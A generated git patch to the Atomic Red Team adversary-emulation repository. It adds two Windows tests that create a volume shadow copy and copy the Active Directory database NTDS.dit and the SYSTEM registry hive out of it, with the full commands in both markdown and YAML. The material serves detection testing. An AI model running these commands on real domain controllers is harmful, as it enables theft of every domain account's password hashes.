From e049f7dc4beceed9db1f07a10f8ab2f08b6ec1fa Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 6 May 2019 16:17:00 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1003/T1003.md | 47 ++++++++++++++++++++++++++++++++++++++++ atomics/index.md | 2 ++ atomics/index.yaml | 40 ++++++++++++++++++++++++++++++++++ atomics/windows-index.md | 2 ++ 4 files changed, 91 insertions(+) diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 6f2bdc75..768817ec 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -151,6 +151,10 @@ The /proc filesystem on Linux contains a great deal of information regarding the - [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil) +- [Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-9---create-volume-shadow-copy-with-ntdsdit) + +- [Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-10---copy-ntdsdit-from-volume-shadow-copy) +
@@ -305,3 +309,46 @@ subsequent domain controllers without the need of network-based replication. ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q ```
+
+ +## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit +The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| drive_letter | Drive letter to source VSC (including colon) | String | C:| + +#### Run it with `command_prompt`! +``` +vssadmin.exe create shadow /for=#{drive_letter} +``` +
+
+ +## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy +The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + +This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". +A successful test also requires the export of the SYSTEM Registry hive. +This test must be executed on a Windows Domain Controller. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1| +| extract_path | Path for extracted NTDS.dit | Path | C:\Extract| + +#### Run it with `command_prompt`! +``` +copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit +copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE +reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE +``` +
diff --git a/atomics/index.md b/atomics/index.md index 0fd017ec..63d81599 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -506,6 +506,8 @@ - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] - Atomic Test #7: Offline Credential Theft With Mimikatz [windows] - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows] + - Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows] + - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows] - [T1081 Credentials in Files](./T1081/T1081.md) - Atomic Test #1: Browser and System credentials [macos] - Atomic Test #2: Extract credentials from files [macos, linux] diff --git a/atomics/index.yaml b/atomics/index.yaml index 22335aed..3c9760ef 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -14318,6 +14318,46 @@ credential-access: command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q ' + - name: Create Volume Shadow Copy with NTDS.dit + description: 'The Active Directory database NTDS.dit may be dumped by copying + it from a Volume Shadow Copy. + +' + supported_platforms: + - windows + input_arguments: + drive_letter: + description: Drive letter to source VSC (including colon) + type: String + default: 'C:' + executor: + name: command_prompt + command: 'vssadmin.exe create shadow /for=#{drive_letter} + +' + - name: Copy NTDS.dit from Volume Shadow Copy + description: "The Active Directory database NTDS.dit may be dumped by copying + it from a Volume Shadow Copy.\n\nThis test requires steps taken in the test + \"Create Volume Shadow Copy with NTDS.dit\".\nA successful test also requires + the export of the SYSTEM Registry hive. \nThis test must be executed on a + Windows Domain Controller.\n" + supported_platforms: + - windows + input_arguments: + vsc_name: + description: Name of Volume Shadow Copy + type: String + default: "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1" + extract_path: + description: Path for extracted NTDS.dit + type: Path + default: C:\Extract + executor: + name: command_prompt + command: |- + copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit + copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE + reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE T1081: technique: external_references: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 11ebfa94..3cf550a2 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -342,6 +342,8 @@ - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] - Atomic Test #7: Offline Credential Theft With Mimikatz [windows] - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows] + - Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows] + - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows] - [T1081 Credentials in Files](./T1081/T1081.md) - Atomic Test #3: Mimikatz & Kittenz [windows] - Atomic Test #4: Extracting credentials from files [windows]